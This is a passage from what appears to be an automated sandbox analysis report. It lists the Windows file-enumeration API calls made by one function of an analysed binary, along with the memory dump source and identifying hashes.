                                • Part of subcall function 009F4910: wsprintfA.USER32 ref: 009F492C
                                • Part of subcall function 009F4910: FindFirstFileA.KERNEL32(?,?), ref: 009F4943
                                • Part of subcall function 009F4910: StrCmpCA.SHLWAPI(?,00A00FDC), ref: 009F4971
                                • Part of subcall function 009F4910: StrCmpCA.SHLWAPI(?,00A00FE0), ref: 009F4987
                                • Part of subcall function 009F4910: FindNextFileA.KERNEL32(000000FF,?), ref: 009F4B7D
                                • Part of subcall function 009F4910: FindClose.KERNEL32(000000FF), ref: 009F4B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 32a84404844ac71522b929bab62e6dc93a17541b8cef960d68c6364669283aea
                              • Instruction ID: 38bc254bbc996d0dc1f8db595b89a4618dd15fb31123265ff7c0c4fe419dd3d4
                              • Opcode Fuzzy Hash: 32a84404844ac71522b929bab62e6dc93a17541b8cef960d68c6364669283aea
                              • Instruction Fuzzy Hash: 1221687691020C67CB64FB70EC46FEE337CAB94700F004554B659965C1EEB49AC98B92